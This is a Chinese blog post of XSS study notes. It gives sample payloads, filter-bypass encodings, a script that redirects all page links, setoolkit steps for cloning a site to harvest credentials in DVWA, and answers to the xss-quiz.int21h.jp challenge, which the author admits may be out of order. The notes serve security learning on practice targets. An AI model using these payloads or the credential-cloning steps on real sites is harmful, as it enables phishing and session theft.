web安全攻防笔记四:XSS跨站脚本

最新推荐文章于 2023-04-16 13:09:02 发布
最新推荐文章于 2023-04-16 13:09:02 发布
阅读量194 收藏 1
点赞数
分类专栏: Web安全攻防 文章标签: xss web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoduu/article/details/107340688
版权

文章目录

XSS跨站脚本

一、XSS漏洞介绍

  • Cross Site Scripting跨站脚本攻击,区分CSS 层叠样式表

二、XSS类型

1、反射型
  • 非持久性攻击
2、存储型
  • 持久性攻击
  • <script>alert(document.cookie);
3、DOM型
  • 页面结构

三、XSS篡改链接

  • 使用javascript中的匿名函数 
    • <script> 
	window.onload = function(){ 
		var link = document.getElementsByTagName("a"); 
		for(j=0;j<link.length;j++){ 
			link[j].href = "http://www.baidu.com"; 
			} 
		}
</script>
  • beef-xss工具

四、盗取用户信息

  • setoolkit克隆网站工具
    • kali中输入setoolkit
    • 社会工程攻击–>1
    • 网站攻击–>2
    • 凭据手机攻击–>3
    • root网站克隆–>2
    • 在DVWA中XSS(Stored)中执行

五、XSS攻击

  • 探测过程
    • 构造一个不会被识别为恶意代码的字符串提交到页面中
    • 去浏览器审查工具中查看提交的字符串所在的位置
  • payload 
    • <script>alert(document.domain);</script>
"</b><scripat>alert(document.cookie);</script>
" onmouseover=" alert(document.domain)>
base64编码、unicode、十进制、十六进制
HTML实体
js伪协议方式:javascript:xxxxxxxxx
    • 属性 
      • hidden:隐藏属性
text
style:写css的
password
disabled
readonly
maxlength
    • CSS属性:backgroud:url(“xxxx”)
    • IE版本:ietester

六、XSS靶场

题目:https://xss-quiz.int21h.jp/
解决思路:
后面几题答案顺序可能是乱的(12题的思路可能是11题的),太久没去弄了,已经忘了

  • 1、<script>alert(document.domain)
  • 2、οnmοuseοver=alert(document.domain)
  • 3、注意hidden
  • 4、注意length limited
  • 5、javascript:alert(document.domain),伪代码,在a标签中,会告诉a标签执行javascript后面的语句
  • 6、span标签内有onclick属性,οnclick=“alert(document.domain)”
  • 7、双写
  • 8、base64编码
  • 9、 
    • "><a href="javascr&#09ipt:alert(document.domain)">xss</a>
    • tab制表符html十进制编码
    • html所有的转义字符:https://blog.csdn.net/hemeinvyiqiluoben/article/details/79750575
  • 10、background:url(“javascript:alert(document.domain);”),需要用老版本的IE浏览器或者软件ietester,IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和javascript表达式关联起来
  • 11、here:expres/**/sion(if(!window.x){alert(document.domain);window.x=1;});
  • 12、\x3cscript\x3ealert(document.domain)\x3c/script\x3e,双斜杠+16进制绕过,https://www.cnblogs.com/hahayixiao/p/10574133.html
  • 13、\u003cscript\u003ealert(document.domain);\u003c/script\u003e,unicode编码绕过

七、存储型XSS攻击练习

  • 环境pconline
    • 网站中会过滤大部分关键字,但有一些没有过滤
    • 可以查看pconline文件中system\util\Filter.php文件
    • 没有过滤details和ontoggle
    • “><details open οntοggle=eval(”\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert (‘xss’)")><"
  • kali中
    • xsser工具查看有没有XSS漏洞
JTOOP
关注
专栏目录
Web-安全渗透全套教程20XSS跨.zip
05-22
【描述】中的"Web-安全渗透全套教程20XSS跨.zip"暗示了这是一个完整的系列,可能包括多个章节或课程,专门针对XSS跨站脚本攻防策略进行深入讲解。这份教程可能涵盖了从基础概念、类型、利用方式,到防御措施和实际...
XSS Challenges 练习(1-10)
dichiji8804的博客
05-28 468
这几天对XSS Challenges平台进行了练习,网上也有一些相应的解答博客,但是写得都差不多,我觉得可以试一下从怎么做这种题的角度出发去思考问题。 第一题:http://xss-quiz.int21h.jp/ 大概意思就是弹窗内容为(document.domain);就可以通关。直接使用<script>alert(document.domain);</scr...
[理论-学习]Web安全-XSS-基础13
3hex的博客
08-27 597
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课。 环境: XSS Challenges Stage #10:http://xss-quiz.int21h.jp/, Firefox浏览器,BurpSuite 一、概述 绕过鼓励domain为空的xss。 二、XSS探测 1. 正常的数据提交 提交的123abc,出现在input的value属性中。 2. 代码审查 通过代码审计,我们这可以使用标签闭合引入script。 ...
xss challenges闯关详细(6-10)
zsynbw的博客
10-28 609
xss challenges闯关详细
web安全xss漏洞 xss challenges
m0_46377671的博客
10-20 347
http://xss-quiz.int21h.jp/可用于联系xss漏洞 第一题 直接注入 第二题 查看代码: 制造闭合语句 第三题 直接输入时无变化 使用burp后查看具有两个参数的传递 通过更改两个参数参数的注入 达到目的 p2为主要的参数 试用其判断 两个参数必须有值 开始只改变p1的值没有变化。。。发现p2是主要参数 后来改变p2参数 又忘记改p1了。 第题 与第关相似 不过多了个参数p3 尝试使用第三关的方法 不行 看见了这个可与前面第二题相似 尝试 构造闭合 ">
XSS Challenges学习笔记
m0_46143427的博客
04-06 292
文章目录第一关第二关第三关第关 第一关 随便输入数据,点击search,按F12查看元素,发现显示在b标签内 所以先闭合b标签,输入444"</b><script>alert(document.domain)</script><b>就OK了。 第二关 随便输入数据发现不显示,按F12审查元素,找到输入框input标签,发现框框里输入的数据会显示在...
Python_Study Notes For Web Hacking Web安全学习笔记.zip
最新发布
05-24
4. Web漏洞:笔记可能详细介绍了常见的Web安全漏洞,如SQL注入、XSS跨站脚本)攻击、CSRF(跨站请求伪造)等,以及如何利用Python检测和利用这些漏洞。 5. 框架安全:对于像Django和Flask这样的Python Web框架,...
Web安全学习笔记.pdf
10-22
笔记的核心部分是常见Web漏洞的攻防,包括SQL注入、XSS跨站脚本、CSRF跨站请求伪造、SSRF服务器端请求伪造、命令注入、目录穿越、文件读取、文件上传、文件包含、XML External Entity(XXE)攻击、模板注入、XPath...
WAF攻防实战笔记v1.0--Bypass.pdf
03-30
在互联网安全领域,Web应用防火墙(WAF)作为一种流行的防护手段,用于保护Web应用免受诸如SQL注入、跨站脚本攻击(XSS)等常见攻击方式的侵害。然而,随着WAF的广泛部署,攻击者也在不断探索绕过这些安全防护层的...
CTF线下AWD脚本合集.zip
03-31
CTF(Capture The Flag)线下AWD(Attack-Defence,攻击防御)脚本合集是一份专为网络攻防比赛设计的资源包,适用于初学者和那些希望在比赛中快速得分的选手。这个合集主要面向的是那些对网络安全有一定兴趣,但又不...
XSS Challenges部分题目总结
weixin_42299610的博客
03-09 625
xss-quiz.int21h.jp 1.没有过滤的xss <script>alert(document.domain);</script> 属性中的xss 设置独一无二的字符串如:“yyy”,方便查找值在代码中的结果 "><script>alert(document.domain);</script> 3. 选择列表中的xss ...
漏洞篇(XSS跨站脚本攻击二)
m0_58001548的博客
04-16 742
页面中存在一个 p3 参数,type 类型为 hidden,闭合方式为双引号,所以 p3 为隐藏参数。我们使用 burpsuite 进行截断数据包进行分析。p3 的值为 hackme 我们直接插入代码这里必须使用">闭合,这样 XSS 代码才会被执行。
xss Challenge 题解
为之的博客
02-16 543
第一关 <script>alert(document.domain)</script> 第二关 用第一关的代码试了下,看源码发现直接赋值到value上,所以可以对value括号闭合 "><script>alert(document.domain)</script> 第三关 多了个选择框,前面一个输入框怎么输都没...
XSS 漏洞绕过
白菜执笔人的博客
03-04 2741
Web安全攻防 学习笔记 一、XSS 漏洞 1.1、跳过 Stage #9 在 span 标签中添加 onclick= "alert(document.domain)" (其他关卡也可以这样跳过) 1.2、domain 过滤绕过 首先还是构造特殊无害字符串,响应中寻找字符串观察闭合格式。 双写绕过 "><script>alert(document.dodomain...
Web安全攻防的学习——09—(XSS攻击方法:16种主要攻击类型和常见的使用类型)
weixin_42118531的博客
04-02 782
1、XSS攻击 实验环境介绍 地址:https://xss-quiz.int21h.jp/ 探测XSS过程 1.构造一个不会被识别为恶意代码的字符串提交到页面中 2.使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示 1.1 闭合文本标签利用XSS 简单的payload <script>alert(document.domain);</script> ...
初识xss
anma5413的博客
12-31 103
这周学习了xss攻击,也叫做跨站脚本攻击: 找了个练习平台:http://xss-quiz.int21h.jp/ 第一级别: 可以看到要求是弹出域名, 先输入<script>alert(document.domain)</script>试试,可以看到直接弹出域名,代码中并没有添加任何过滤条件。 第二级别: 我们输入的<script>...
js 浏览器的各种弹出框 提示语
热门推荐
qq_41672590的博客
01-25 1万+
一、JS的三种最常见的对话框 //====================== JS最常用三种弹出对话框 ======================== //弹出对话框并输出一段提示信息 function ale() { //弹出一个对话框 alert("提示信息!"); } //弹出一个询问框
XSS探测
qq_37697566的博客
03-02 196
XSS探测 实验地址:https://xss-quiz.int21h.jp/ stage2 "><script>alert(document.domain)</script> stage3 于Select中选择即可 Japan</option><script>alert(document.domain);</script> ...
XSS Challenges通关教程
梦里明明有六趣,觉后空空无大千
02-02 529
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Web安全攻防技术实践:XSS攻击探索
本资源主要关注Web安全领域,涵盖了多种类型的跨站脚本攻击(XSS)和文件上传漏洞。通过实验平台的上传文件功能和AJAX特性,讨论了反射XSS、存储XSS和其他类型的XSS攻击,以及如何避免这些攻击。 1. 文件上传漏洞:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值